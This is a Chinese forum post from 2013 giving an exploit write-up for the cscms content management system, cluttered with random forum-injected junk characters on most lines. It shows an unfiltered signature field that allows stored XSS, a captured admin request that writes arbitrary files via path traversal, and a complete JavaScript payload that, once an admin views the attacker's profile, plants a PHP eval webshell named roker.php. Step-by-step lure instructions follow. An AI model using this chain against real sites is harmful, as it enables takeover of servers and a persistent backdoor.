|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题" N0 P0 ^( K/ W+ `
官网已经修补了,所以重新下了源码* H; t2 w, K1 q3 H
因为 后台登入 还需要认证码 所以 注入就没看了。
0 d6 O$ I B1 R: @7 B8 }% F: |存在 xss
9 M6 P+ S+ {5 U7 r漏洞文件 user/member/skin_edit.php
; u! x3 e% x" I! Y* [: A本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:' T% K# V) m$ \' X
6 e; V* `5 |: g# L/ u) U. v</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
9 R" r! f( V7 G e
( R9 W1 ]9 Y2 B* C+ @, s</textarea></td></tr>' y# M9 c0 F$ {% W
( o5 N/ k6 r7 R user/do.php
8 w: ?; J8 M, f* y, c
! a( w6 @9 P& S9 ]1 Q+ v1 g5 o8 J0 b4 f1 o8 W; n3 L/ F8 M
if($op=='zl'){ //资料, p: N0 q8 h, I8 V+ K. V' @
' f0 z( C* z4 z( t8 k T
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) ' H6 q: o- D% U+ o* V& n& c5 h0 P
exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
) r" N/ v$ a) H% B) D' G$ c
5 f0 \: V4 X% I$ M: h' C3 C $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',1 z; k& c$ w" V d" V0 @7 A
8 O# d$ U3 r5 W1 H
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
; v/ A- S$ R0 j" r) f5 e0 O where CS_Name='".$cscms_name."'";$ ]# j/ A7 K6 \
. D/ e' a9 V: M
if($db->query($sql)){
/ @2 `0 y! ]/ w Z9 u) r " t, T* }+ t/ Y& A
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
7 S( t1 Q/ S: d* H; X1 i $ i8 B7 d6 y! g8 m8 @* Y
}else{" |: o/ z+ Q( w$ ?# H
! E2 K8 y" f$ q% F
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));1 U |0 Y7 J, k, K' R, X0 [5 {% c
) l8 F& B1 c# {" j N' }& b }* f K% }. T. B1 X% ^/ Y
& L$ P6 ~% v1 L/ ?3 s3 ^6 W
6 H5 k( N2 s6 p没有 过滤导致xss产生。' a. S* P' w5 Q6 J8 t
后台 看了下 很奇葩的是可以写任意格式文件。。) T9 u1 N/ D* \+ Q
抓包。。
- n" t8 I5 @& a+ Z% o( n% a5 @
2 z3 m% e% t2 ?6 O% H5 E3 @4 E: Z8 A8 {! |, f
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
/ V" |" A$ ?' d3 O2 e# Q& G/ v $ Q! h" H/ z4 b; K+ W* |6 a# q, U
Accept: text/html, application/xhtml+xml, */*
" \" M- ]( T5 i3 d
6 U5 E1 @8 }. j, pReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php M' W7 A( v3 z- z, z" C% e
% y: \& F! v' x' V3 j* w/ NAccept-Language: zh-CN
9 J% y; r H2 ]8 Q * n# x) X+ P; M5 N+ R; e3 h
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
" O& m6 V, _* b 1 B) ~$ ?( ]/ M; z+ X
Content-Type: application/x-www-form-urlencoded: Z# ~; p$ y6 t$ u1 _) \! m+ k9 I& f
1 f( \) A4 i$ ]9 x; k5 c, w" m- X7 h
Accept-Encoding: gzip, deflate4 j7 {2 q+ w3 h" w5 J
; y6 h: B$ K; B3 z" `; `! D
Host: 127.0.0.1, U" K% [9 v; q( p3 B6 m7 q& a+ W
6 f5 a2 L( H4 I4 ]7 T) qContent-Length: 38$ a: |+ R1 O. b! k
5 v0 D" t T. g. Z& kDNT: 19 ]$ z: S7 |0 [5 ]
, v. j( U" \6 z, L* B( K. W5 O
Connection: Keep-Alive
* i: H; B. _- O o* S
% E& x, F# Q( L( r' XCache-Control: no-cache
$ u+ y2 Z9 t! F- q" e
; }4 a9 b |8 |) w. v" J( E; [Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
4 c# k& a2 N# M8 z
$ j) P' H( s* z5 K1 _0 [) e8 K# m+ Z7 w, W) X- [9 e+ S# y4 a- n( j
name=aaa.php&content=%3Cs%3E%3Ca%25%3E6 [( W6 ?' V5 m9 o# d. q
+ `( s% ?# a( \3 b8 r$ J
* d4 O0 G; C! a# [
: w; }: A9 P0 w( V' m# l于是 构造js如下。- L: b" i' m9 k' _7 R
) ?# c* r$ `4 [ ~4 ^& r8 r本帖隐藏的内容<script>
! u8 C, S! D9 U3 k% ]( _3 Z/ T- ythisTHost = top.location.hostname;
5 |2 }' U2 D, R+ E" g ' L0 U: V" e( m& M2 ], ?' l
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";( N/ X9 H# m! y ~0 D# p( T
2 S2 Y' l$ ^7 b u+ \
function PostSubmit(url, data, msg) {
7 H1 l* L2 q3 d" z- c var postUrl = url;
- }0 q2 r5 o% J! I# I
- F4 x& V/ \) X, {" K } var postData = data;
9 C# m1 B g$ j- D% i5 z var msgData = msg; 4 A7 t2 I* b2 i$ i0 y
var ExportForm = document.createElement("FORM");
3 Y0 a% a/ ^. }3 a, m* W document.body.appendChild(ExportForm);
r6 L Y. w' n9 i& ` ExportForm.method = "POST"; 3 x* ?% E. t/ C, S1 M
var newElement = document.createElement("input");
) |+ k4 v* w$ }+ G2 a9 t newElement.setAttribute("name", "name"); 4 a# }- G1 a9 e9 l. J
newElement.setAttribute("type", "hidden");
# g ~% Y5 `% E3 @8 m var newElement2 = document.createElement("input"); " D8 q M! R% u+ Q
newElement2.setAttribute("name", "content"); 4 l+ b( ~' Q8 N( v5 j) Y; }8 ~
newElement2.setAttribute("type", "hidden");
# w# A, l$ U; z ExportForm.appendChild(newElement);
5 g/ o6 u! M) U( l ExportForm.appendChild(newElement2); % q) J4 `9 U Z1 `
newElement.value = postData; 6 x# H9 y9 a, t Y$ n+ D
newElement2.value = msgData; 6 |. w) W6 A; e( N& A; ^- J. e
ExportForm.action = postUrl; " H- ~+ S/ R( F/ j
ExportForm.submit(); $ i2 c& _; h- o& M" Y6 N
};
& g, V8 i( ], H! ? 5 f: ^' H3 ?) V3 w0 F! q" u) }
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
/ q/ n! b; p" H3 I+ G* u D7 y 3 e( b, ^, u2 n* @& Q' Z* J
</script>
% f( Y7 f' ?3 F& V$ w( f! Y+ y( N4 h
5 d4 w3 P* l/ l- f1 ]2 n. i P$ [4 @2 _4 L
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
7 t& |6 E2 r% C8 B用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)7 X2 w: U, H8 s( a4 e0 k7 }, |- }
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
. N9 M, L- b! Y+ _& B
|
|
发表于 2013-11-6 18:09:37
收藏
支持
反对